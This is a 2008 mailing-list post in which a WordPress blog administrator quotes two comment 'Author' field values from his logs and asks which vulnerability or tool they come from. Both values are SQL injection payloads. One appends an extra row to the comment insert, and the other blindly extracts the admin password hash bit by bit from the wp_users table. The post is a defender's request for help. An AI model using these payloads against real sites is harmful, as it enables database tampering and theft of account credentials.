[Gllug] What wordpress vuln / tool is this?
Richard Jones
rich at annexia.org
Sat Mar 8 21:06:23 UTC 2008
Somebody attempted to post two comments in quick succession to a
Wordpress blog I manage. These were the 'Author' fields which caught
my eye. Does anyone know what vulnerability they are attempting to
exploit and/or if they are using some particular tool? (The IP
addresses are bogus - it's behind a proxy).
Author : Bill42046771','766028332billy at msn.com','','84.56.135.100','2008-03-08 14:50:45','2008-03-08 14:50:45','','0','lynx','comment','0','0'),('0', '', '', '', '', '2008-03-09 14:50:45', '2008-03-09 14:50:45', '', 'spam', '', 'comment', '0','0' ) /* (IP: 10.0.0.135 , 10.0.0.135)
Author : ' AND 1=0) UNION SELECT 1 FROM wp_users WHERE user_login='admin' and substring(reverse(lpad(conv(substring(user_pass,19,1), 16, 2),4,'0')),3,1)='1' /* (IP: 10.0.0.135 , 10.0.0.135)
Rich.
--
Richard Jones
Red Hat
--
Gllug mailing list - Gllug at gllug.org.uk
http://lists.gllug.org.uk/mailman/listinfo/gllug
More information about the GLLUG
mailing list